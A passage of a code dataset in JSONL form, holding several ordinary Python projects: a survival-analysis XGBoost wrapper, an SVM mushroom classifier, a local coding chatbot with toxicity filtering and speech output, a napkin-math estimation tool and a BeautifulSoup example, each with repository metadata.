y_train),(X_test, y_test)]\n #print('eval_set',eval_set)\n kwargs['eval_set'] = eval_set\n \n return super(XGBSurv, self).fit(X_train, y_train, **kwargs)\n else:\n X, y = self._sort_X_y(X,y)\n return super(XGBSurv, self).fit(X, y, **kwargs)\n \n # TODO: DataFrame Option\n def predict_cumulative_hazard_function(\n self, \n X_train: np.array,\n X_test: np.array,\n y_train: np.array,\n y_test: np.array, \n ) -> pd.DataFrame:\n \"\"\"Obtain cumulative hazard function from your model.\"\"\"\n if self.model_type:\n\n train_pred_hazards = super(XGBSurv, self).predict(X_train, output_margin=True)\n test_pred_hazards = super(XGBSurv, self).predict(X_test, output_margin=True)\n cum_hazard_predictions = pred_dict[str(self.model_type)](\n X_train, \n X_test, \n y_train, \n y_test,\n train_pred_hazards, \n test_pred_hazards\n )\n return cum_hazard_predictions\n else:\n raise NotImplementedError(\"Cumulative hazard not applicable to the model you provided.\")\n \n # TODO: add model condition\n def predict_survival_function(\n self, \n X_train: np.array, \n X_test: np.array,\n y_train: np.array, \n y_test: np.array):\n \"\"\"Obtain survival function from your model.\"\"\"\n \n X_train, y_train = self._sort_X_y(X_train, y_train)\n X_test, y_test = self._sort_X_y(X_test, y_test)\n df_cumulative_hazard = self.predict_cumulative_hazard_function(X_train, \n X_test, y_train, y_test)\n return np.exp(-df_cumulative_hazard)\n \n def get_loss_functions(self):\n \"\"\"Get implemented survival loss functions.\"\"\"\n return loss_dict\n \n def get_objective_functions(self):\n \"\"\"Get implemented survival objective functions.\"\"\"\n return objective_dict\n \n def _sort_X_y(self, X, y):\n \"\"\"Sort X, y data by absolute time.\"\"\"\n if isinstance(y, (pd.Series, pd.DataFrame)):\n y = y.values\n if not isinstance(y, np.ndarray):\n print('y error',y, type(y))\n raise ValueError(f'y is not numpy.ndarray. 
Got {type(y)}.')\n #new condition begin\n if y.ndim > 1:\n #print(\"Array has more than one dimension.\")\n # Check if the array has more than one column\n if y.shape[1] > 1:\n y_abs = y[:,0]\n else: \n y_abs = y.copy() \n y_abs = np.absolute(y_abs)\n #condition end\n #y_abs = np.absolute(y)\n if not np.all(np.diff(y_abs) >= 0):\n #print('Values are being sorted!')\n order = np.argsort(y_abs, kind=\"mergesort\")\n y = y[order]\n X = X[order]\n return X, y\n \n", "repo_name": "jatlantic/xgbsurv", "sub_path": "xgbsurv/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 8748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "32", "api": [{"api_name": "xgbsurv.models.breslow_final.breslow_likelihood", "line_number": 25, "usage_type": "name"}, {"api_name": "xgbsurv.models.efron_final.efron_likelihood", "line_number": 26, "usage_type": "name"}, {"api_name": "xgbsurv.models.cind_final.cind_loss", "line_number": 27, "usage_type": "name"}, {"api_name": "xgbsurv.models.deephit_pycox_final.deephit_loss1_pycox", "line_number": 28, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_aft_final.aft_likelihood", "line_number": 29, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_ah_final.ah_likelihood", "line_number": 30, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_final.eh_likelihood", "line_number": 31, "usage_type": "name"}, {"api_name": "xgbsurv.models.breslow_final.breslow_objective", "line_number": 36, "usage_type": "name"}, {"api_name": "xgbsurv.models.efron_final.efron_objective", "line_number": 37, "usage_type": "name"}, {"api_name": "xgbsurv.models.cind_final.cind_objective", "line_number": 38, "usage_type": "name"}, {"api_name": "xgbsurv.models.deephit_pycox_final.deephit_pycox_objective", "line_number": 39, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_aft_final.aft_objective", "line_number": 40, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_ah_final.ah_objective", "line_number": 41, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_final.eh_objective", "line_number": 42, "usage_type": "name"}, {"api_name": "xgbsurv.models.breslow_final.get_cumulative_hazard_function_breslow", "line_number": 46, "usage_type": "name"}, {"api_name": "xgbsurv.models.efron_final.get_cumulative_hazard_function_efron", "line_number": 47, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_aft_final.get_cumulative_hazard_function_aft", "line_number": 48, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_ah_final.get_cumulative_hazard_function_ah", "line_number": 49, "usage_type": "name"}, {"api_name": "xgbsurv.models.eh_final.get_cumulative_hazard_function_eh", "line_number": 50, "usage_type": "name"}, {"api_name": "xgboost.XGBRegressor", "line_number": 53, "usage_type": "name"}, {"api_name": "xgbsurv.docstrings.xgbsurv_docstrings.get_xgbsurv_docstring", "line_number": 55, "usage_type": "call"}, {"api_name": "xgbsurv.docstrings.xgbsurv_docstrings.get_xgbsurv_fit_docstring", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 89, "usage_type": "attribute"}, {"api_name": 
"xgbsurv.models.utils.sort_X_y_pandas", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 91, "usage_type": "attribute"}, {"api_name": "xgboost.XGBRegressor", "line_number": 98, "usage_type": "argument"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 112, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 118, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 121, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 124, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 127, "usage_type": "attribute"}, {"api_name": "xgbsurv.models.utils.sort_X_y_pandas", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 175, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 183, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 213, "usage_type": "call"}]}
+{"seq_id": "38917339054", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random as rd\n\nclass RandomSEt:\n def __init__(self, count_of_points, max_distance) -> None:\n self.points = count_of_points\n self.max_walk = max_distance\n self.data = []\n \n def show(self):\n data = self.data\n X, Y, Z = [], [], []\n\n for (x, y, z) in data:\n X.append(x)\n Y.append(y)\n Z.append(z)\n X, Y, Z = np.array(X), np.array(Y), np.array(Z)\n axes_3d = plt.figure().add_subplot(projection=\"3d\")\n axes_3d.set_xlabel(\"X\")\n axes_3d.set_ylabel(\"Y\")\n axes_3d.set_zlabel(\"z\")\n axes_3d.scatter(X, Y, Z, c=Z, cmap=\"magma\", s=0.98)\n axes_3d.plot(X, Y, Z, color=\"black\", linewidth=0.23)\n plt.show()\n \n\n def random_set(self):\n data = []\n x_grid = [0]\n y_grid = [0]\n z_grid = [0]\n for elem in range(self.points):\n\n x_step = rd.randint(0, 100)\n x_direction = rd.choice([-1, 1])\n x = x_grid[-1] + x_step * x_direction\n\n y_step = rd.randint(0, 100)\n y_direction = rd.choice([-1, 1])\n y = y_grid[-1] + y_step * y_direction\n\n z_step = rd.randint(0, 100)\n z_direction = rd.choice([-1, 1])\n z = z_grid[-1] + z_step * z_direction\n\n x_grid.append(x)\n y_grid.append(y)\n z_grid.append(z)\n \n for core in zip(x_grid, y_grid, z_grid):\n data.append(core)\n \n data = np.array(data)\n self.data = data\n return data\n \n \"\"\"def generate_random_walk(self):\n x_grid = [rd.randint(0, 123)]\n y_grid = [rd.randint(0, 123)]\n z_grid = [rd.randint(0, 123)]\n\n for elem in range(self.points):\n tmp_list = []\n for core in range(self.max_walk):\"\"\"\n\n\n \nif __name__ == \"__main__\":\n new_object = RandomSEt(1000, 5)\n new_object.random_set()\n new_object.show()\n\n\n\n\n", "repo_name": "Asdergh/Projects", "sub_path": "lab_json_stat.py", "file_name": "lab_json_stat.py", "file_ext": "py", "file_size_in_byte": 2008, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 37, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 40, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 44, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}]}
+{"seq_id": "36645795369", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 7 07:23:38 2020\r\n\r\n@author: Parshva Timbadia\r\n\"\"\"\r\n\r\n\r\n#IMPORTING LIBRARIES\r\n\r\nimport pandas as pd\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\n#IMPORT DATASET.\r\ncolnames = ['Class', 'cap-shape', 'cap-surface','cap-color', 'bruises',\r\n 'odor', 'gill-attachment', 'gill-spacing','gill-size', 'gill-color',\r\n 'stalk-shape', 'stalk-root', 'stalk-surface-above-ring', \r\n 'stalk-surface-below-ring','stalk-color-above-ring',\r\n 'stalk-color-below-ring' , 'veil-type', 'veil-color',\r\n 'ring-number', 'ring-type', 'spore-print-color',\r\n 'population', 'habitat']\r\ndataset= pd.read_csv(\"agaricus-lepiota.data\", names = colnames)\r\n\r\n\r\n# print(dataset.head())\r\n# print(len(dataset))\r\n\r\n#Replacing ? to NaN \r\ndataset=dataset.replace(['?'], np.nan)\r\n\r\n#Checking for the NULL values in the dataset.\r\ncheck_for_null =dataset.isnull().sum()\r\n# print(check_for_null)\r\n\r\n#After printinh we were able to see that there were missing values. \r\n\r\ndataset[colnames] =dataset[colnames].fillna(dataset.mode().iloc[0])\r\n\r\n# check_for_null =dataset.isnull().sum()\r\n# print(check_for_null)\r\n#We can see that the missing values get handled.\r\n\r\n# creating instance of labelencoder\r\nlabelencoder = LabelEncoder()\r\nfor i in colnames:\r\n dataset[i]=labelencoder.fit_transform(dataset[i])\r\n#Spliting dependent and Independent variables\r\n\r\n# print(dataset.head())\r\nx= dataset.iloc[:, 1:].values\r\ny= dataset.iloc[:, 0].values\r\n\r\n#Now we will seperate Training Data and Testing Data. Note: Random State helps to collect Dataset randomly for testing data.\r\nx_train, x_test , y_train , y_test = train_test_split(x, y, test_size=0.2)\r\n\r\n\r\n#Now using SVC object to train the data.\r\n\"\"\"\r\n\r\nNOTE: If you want accuracy to be more accurate like 1.0 for this dataset. Make the following changes in \r\nthe SVC model. \r\n\r\nkernel='poly'\r\ndegree=8 \r\n\r\nNOTE: As we have not included Randon_State to some value, everytime you run the algorithm, it will \r\nprovide different accuracy as it will select Training and Testing Data randomly. Howver, it always \r\ntouches 0.97 + in linear case.\r\n\r\n\"\"\"\r\nsvc_model=SVC(kernel='linear')\r\nsvc_model.fit(x_train, y_train)\r\n\r\n#Now making predictions. 
\r\n\r\ny_pred = svc_model.predict(x_test)\r\n\r\n#Testing Accuracy Now.\r\n\r\nprint(confusion_matrix(y_test,y_pred))\r\nprint(classification_report(y_test,y_pred))\r\nprint(\"Model Score :\", svc_model.score(x_test, y_test))\r\n\r\n\r\n\r\n", "repo_name": "ParshvaTimbadia/Artificial-Intelligence", "sub_path": "Week 5/PA!/svm2.py", "file_name": "svm2.py", "file_ext": "py", "file_size_in_byte": 2775, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 35, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 77, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "27038320493", "text": "# AGC_gain -v.1.0\n\nimport argparse\nimport h5py\nimport numpy as np\n\nfrom gprMax.exceptions import CmdInputError\n\n# Parse command line arguments\nparser = argparse.ArgumentParser(description='create a new ouputfile gained by user defined type {constant, linear, exponential}')\nparser.add_argument('filename', help='base name of output file including path')\nparser.add_argument('gatelenght', help='lengh (ns) of the AGC time gate')\nargs = parser.parse_args()\n\nfilename = args.filename\noutputfile = args.filename.replace('.out', '_AGC.out')\n\n# Open filename and read some attributes\nf = h5py.File(filename, 'r')\nnrx = f.attrs['nrx']\niterations = f.attrs['Iterations']\ndt = f.attrs['dt']\n\n# Write new outputfile\nfg = h5py.File(outputfile, 'w')\nfg.attrs['Iterations'] = iterations\nfg.attrs['dt'] = dt\nfg.attrs['nrx'] = nrx\ntime = np.linspace(0, 1, iterations) * (iterations * dt)\n\n\n", "repo_name": "svedrine/Outdated-", "sub_path": "simon/AGC_gain.py", "file_name": "AGC_gain.py", "file_ext": "py", "file_size_in_byte": 875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 19, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "37275871287", "text": "import os\n\nfrom transformers import pipeline, AutoModelForCausalLM, AutoTokenizer\nimport torch\n\nimport detoxify\nimport nltk\n\nfrom bark import SAMPLE_RATE\nimport numpy\nfrom scipy.io.wavfile import write as write_wav\nfrom IPython.display import Audio\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n## Empty GPY cache\ntorch.cuda.empty_cache()\n\n# init env variables\n\nos.environ[\"SUNO_OFFLOAD_CPU\"] = \"True\"\nos.environ[\"SUNO_USE_SMALL_MODELS\"] = \"True\"\nos.environ[\"TRANSFORMERS_OFFLINE\"] = \"1\"\nos.environ[\"HF_DATASETS_OFFLINE\"] = \"1\"\n\n# init needed models\n\ncontext = \"You are an AI programming assistant, utilizing the Deepseek Coder model, developed by Deepseek Company, \\\nand you only answer questions related to computer science. For politically sensitive questions, \\\nsecurity and privacy issues, and other non-computer science questions, you will refuse to answer.\"\n\n\nmodel_name_or_path = \"TheBloke/deepseek-coder-1.3b-instruct-GPTQ\"\n\nmodel = AutoModelForCausalLM.from_pretrained(model_name_or_path,\n device_map=\"auto\",\n trust_remote_code=False,\n revision=\"main\",\n local_files_only=True).cuda()\n\nmodel.save_pretrained(\"./libs/saved/deepseeker\")\n\ntokenizer = AutoTokenizer.from_pretrained(model_name_or_path, use_fast=True, local_files_only=True)\ntokenizer.save_pretrained(\"./libs/saved/deepseeker\")\n\n# Defining the functions we will use\n\ndef detox(seq):\n results = detoxify.Detoxify('original-small', device='cuda').predict(seq)\n for k, v in results.items():\n if v > 0.1:\n return f\"Error: Sorry but your prompt/answer did not pass the {k} test.\"\n torch.cuda.empty_cache()\n return \"OK\"\n\ndef vocal_answer(answer):\n sentences = nltk.sent_tokenize(answer)\n VOICE = \"v2/en_speaker_6\"\n SILENCE = numpy.zeros((int(SAMPLE_RATE*0.25), 1), numpy.float32) #numpy array of silence for 0.25s\n pieces = [SILENCE]\n synthesiser = pipeline(\"text-to-speech\", \"suno/bark-small\")\n # Breaking the response into pieces to generate above 13 seconds\n for sentence in sentences:\n # will uncomment once the transformers library will be updated to contain this new voice_preset\n # Until then, we can't use the same voice for the answer\n # speech = synthesiser(sentence, forward_params={\"voice_preset\": VOICE, \"do_sample\": True, \"pad_token_id\": 0})\n speech = synthesiser(sentence, forward_params={\"do_sample\": True, \"pad_token_id\": 0})\n pieces += [speech['audio'].T, SILENCE]\n torch.cuda.empty_cache()\n final_speech = numpy.concatenate(pieces)\n write_wav(\"response.wav\", rate=speech[\"sampling_rate\"], data=final_speech)\n Audio(\"response.wav\")\n\ndef generate_format_output(prompt_template):\n pipe = pipeline(\n \"text-generation\",\n model=model,\n tokenizer=tokenizer,\n max_new_tokens=255,\n do_sample=True,\n temperature=0.7,\n top_p=0.1,\n top_k=35,\n repetition_penalty=1.1\n )\n output = pipe(prompt_template)[0]['generated_text']\n output = output.split(\"Response:\")[1]\n # output = output.split(\"\\n\")[0]\n torch.cuda.empty_cache()\n return output\n\ndef loop():\n sequence = \"\"\n while (sequence != \"exit\"):\n # Get prompt input\n sequence = input(\"You: \")\n if sequence == 'exit': break\n # Detox the input\n detox_response = detox(sequence)\n if detox_response != \"OK\":\n print(detox_response)\n continue\n # We accept the prompt\n prompt_template= f\"{context} ### Instruction: {sequence} ### Response:\"\n # generate the answer\n answer = generate_format_output(prompt_template)\n 
detox_response = detox(answer)\n if detox_response != \"OK\":\n print(detox_response)\n continue\n print(f\"Assistant: {answer}\")\n vocal_answer(answer)\n\n\nprint(\"\\n\\nWrite \\'exit\\' as a prompt to exit the program !\\n\\n\")\n\nloop()\n\n\n", "repo_name": "Tarekinh0/LeModel1", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "transformers.AutoModelForCausalLM.from_pretrained", "line_number": 36, "usage_type": "call"}, {"api_name": "transformers.AutoModelForCausalLM", "line_number": 36, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 44, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 44, "usage_type": "name"}, {"api_name": "detoxify.Detoxify", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 54, "usage_type": "attribute"}, {"api_name": "nltk.sent_tokenize", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "bark.SAMPLE_RATE", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "transformers.pipeline", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 71, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 72, "usage_type": "call"}, {"api_name": "IPython.display.Audio", "line_number": 73, "usage_type": "call"}, {"api_name": "transformers.pipeline", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 90, "usage_type": "attribute"}]}
+{"seq_id": "10700831447", "text": "import argparse\nimport ast\nimport collections\nimport lib2to3\nimport lib2to3.fixes\nimport lib2to3.refactor\nimport math\nimport sys\nfrom collections.abc import Iterable\nfrom lib2to3 import fixer_base\n\nimport napkin.units\n\nCONTEXT = {\n # helpful\n 'undef': None,\n\n # math\n 'ceil': math.ceil,\n 'floor': math.floor,\n 'log': math.log,\n 'log2': math.log2,\n}\nCONTEXT.update(napkin.units.CONTEXT)\n\ndef is_variable_assignment(node):\n if not isinstance(node, ast.Assign):\n return False\n if node.targets[0].id != node.targets[0].id.upper():\n return False\n assert len(node.targets) == 1\n return True\n\ndef assigns_to(node):\n assert is_variable_assignment(node)\n return node.targets[0].id \n\ndef find_outputs(name):\n code = ast.parse(open(name).read())\n outputs = []\n for x in ast.walk(code):\n if not is_variable_assignment(x): continue\n outputs.append(assigns_to(x))\n context = CONTEXT.copy()\n exec(open(name).read(), context)\n return dict([(o, context[o]) for o in outputs])\n\ndef find_deps(name):\n code = ast.parse(open(name).read())\n deps = {}\n for x in ast.walk(code):\n if not is_variable_assignment(x): continue\n name = assigns_to(x)\n deps[name] = []\n for y in ast.walk(x):\n if isinstance(y, ast.Name) and y.id not in CONTEXT and y.id != name:\n deps[name].append(y.id)\n return deps\n\ndef transitive_closure(deps, name):\n out = [name]\n for n in deps[name]:\n out += transitive_closure(deps, n)\n return out\n\nVALID_UNITS = [\n 'bytes',\n 'bytes/sec',\n 'seconds',\n 'sigfig',\n 'percent',\n 'raw',\n]\n\ndef humanize_bytes(x):\n return napkin.units.humanize_metric(x, base=1024) + 'iB'\n\ndef humanize_bytes_sec(x):\n return humanize_bytes(x) + '/s'\n\ndef humanize_seconds(x, recurse=False):\n '''Turn a number into a string of the time\n\n >>> humanize_seconds(0)\n '0s'\n >>> humanize_seconds(60)\n '1m'\n >>> humanize_seconds(120)\n '2m'\n >>> humanize_seconds(128)\n '2m8s'\n >>> humanize_seconds(86400)\n '1d'\n >>> humanize_seconds(86401)\n '1d1s'\n\n >>> humanize_seconds(1.01)\n '1s10ms'\n >>> humanize_seconds(3.14159)\n '3s141ms589µs999ns'\n >>> humanize_seconds(51e-9)\n '51ns'\n '''\n for interval, unit in [(86400, 'd'), (3600, 'h'), (60, 'm'), (1, 's'),\n (1e-3, 'ms'), (1e-6, 'µs'), (1e-9, 'ns')]:\n if x >= interval:\n return '%d%s%s' % (x / interval, unit, humanize_seconds(x % interval, True))\n if recurse:\n return ''\n return '0s'\n\ndef humanize_sigfig(x):\n return '%1.2g' % x\n\ndef humanize_percent(x):\n return '%.1f%%' % (100 * x)\n\ndef humanize_raw(x):\n return str(x)\n\nclass Tool:\n\n def __init__(self, outputs):\n self.outputs = outputs\n\n def substitute(self, output, units=None):\n output = self.outputs[output]\n return self._substitute(output, units)\n\n def _substitute(self, output, units):\n if isinstance(output, Iterable):\n return '[' + ', '.join([self._substitute(x, units) for x in output]) + ']'\n if units is not None:\n units = {\n 'bytes/sec': 'bytes_sec'\n }.get(units, units)\n f = globals().get('humanize_' + units, None)\n assert f is not None, 'cannot find humanize_{}'.format(units)\n return f(output)\n if isinstance(output, bool):\n return 'True' if output else 'False'\n if isinstance(output, (float, int)):\n return napkin.units.humanize_metric(output)\n if output is None:\n return 'undefined'\n assert False\n\n def interpret_comment(self, text):\n text = text.strip(' #')\n if text == '': return None, ''\n if text in VALID_UNITS:\n return text, ''\n return None, ' # ' + text\n\ndef changes(filename, 
name):\n deps = find_deps(filename)\n return sorted(set(transitive_closure(deps, name)))\n\ndef is_changed_by(filename, name):\n outs = []\n deps = find_deps(filename)\n for output in deps.keys():\n if name == output:\n continue\n if name in transitive_closure(deps, output):\n outs.append(output)\n return sorted(set(outs))\n\ndef constants(filename):\n outputs = find_outputs(filename)\n deps = find_deps(filename)\n for o in outputs:\n if not deps[o]:\n yield o\n\ndef translate(filename):\n outputs = find_outputs(filename)\n rt = lib2to3.refactor.RefactoringTool(('napkin.substitute',), {'NAPKIN': Tool(outputs)})\n translated = (rt.refactor_string(open(filename).read(), filename))\n return str(translated).rstrip()\n\ndef main():\n parser = argparse.ArgumentParser(prog='napkin')\n # TODO(rescrv):\n # - allow sweeping a parameter\n parser.add_argument('--changes', metavar='V', type=str,\n help='what variables change the provided argument')\n parser.add_argument('--is-changed-by', metavar='V', type=str,\n help='what variables are changed by the provided argument')\n parser.add_argument('--constants', '-c', action='store_true',\n dest='constants', default=None,\n help='print all contants')\n parser.add_argument('input', help='input napkin filename')\n\n args = parser.parse_args()\n\n actions = [v for v in [\n args.changes,\n args.is_changed_by,\n args.constants,\n ] if v is not None]\n if len(actions) > 1:\n print('provided too many different actions', file=sys.stderr)\n sys.exit(1)\n\n if args.changes:\n for x in changes(args.input, args.changes):\n print(x)\n if args.is_changed_by:\n c = constants(args.input)\n for x in is_changed_by(args.input, args.is_changed_by):\n print(x)\n if args.constants:\n for c in sorted(constants(args.input)):\n print(c)\n if len(actions) == 0:\n print(translate(args.input).rstrip())\n\nif __name__ == '__main__':\n main()\n", "repo_name": "rescrv/napkin", "sub_path": "napkin/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 5997, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "math.ceil", "line_number": 19, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 20, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 21, "usage_type": "attribute"}, {"api_name": "math.log2", "line_number": 22, "usage_type": "attribute"}, {"api_name": "napkin.units.units", "line_number": 24, "usage_type": "attribute"}, {"api_name": "napkin.units", "line_number": 24, "usage_type": "name"}, {"api_name": "ast.Assign", "line_number": 27, "usage_type": "attribute"}, {"api_name": "ast.parse", "line_number": 39, "usage_type": "call"}, {"api_name": "ast.walk", "line_number": 41, "usage_type": "call"}, {"api_name": "ast.parse", "line_number": 49, "usage_type": "call"}, {"api_name": "ast.walk", "line_number": 51, "usage_type": "call"}, {"api_name": "ast.walk", "line_number": 55, "usage_type": "call"}, {"api_name": "ast.Name", "line_number": 56, "usage_type": "attribute"}, {"api_name": "napkin.units.units.humanize_metric", "line_number": 76, "usage_type": "call"}, {"api_name": "napkin.units.units", "line_number": 76, "usage_type": "attribute"}, {"api_name": "napkin.units", "line_number": 76, "usage_type": "name"}, {"api_name": "collections.abc.Iterable", "line_number": 131, "usage_type": "argument"}, {"api_name": "napkin.units.units.humanize_metric", "line_number": 143, "usage_type": "call"}, {"api_name": "napkin.units.units", "line_number": 143, 
"usage_type": "attribute"}, {"api_name": "napkin.units", "line_number": 143, "usage_type": "name"}, {"api_name": "lib2to3.refactor.RefactoringTool", "line_number": 178, "usage_type": "call"}, {"api_name": "lib2to3.refactor", "line_number": 178, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 183, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 203, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 204, "usage_type": "call"}]}
+{"seq_id": "13926380947", "text": "from bs4 import BeautifulSoup\n\ndef get_context(path):\n with open(path, 'r') as file:\n return file.read()\n\nif __name__ == '__main__':\n content = get_context('..\\\\requests\\\\econpy.html')\n bs = BeautifulSoup(content, 'html.parser')\n div = bs.find('div', {'title':'buyer-info' })\n div['id'] = 'I0001'\n div['title'] = 'buyer-data'\n div.div.string = 'Gabriel A'\n div.span.string = '35.89'\n print(div)", "repo_name": "gabriel-acuna/web-scraping", "sub_path": "3.changing_dom/1.-modify element.py", "file_name": "1.-modify element.py", "file_ext": "py", "file_size_in_byte": 429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "bs4.BeautifulSoup", "line_number": 9, "usage_type": "call"}]}
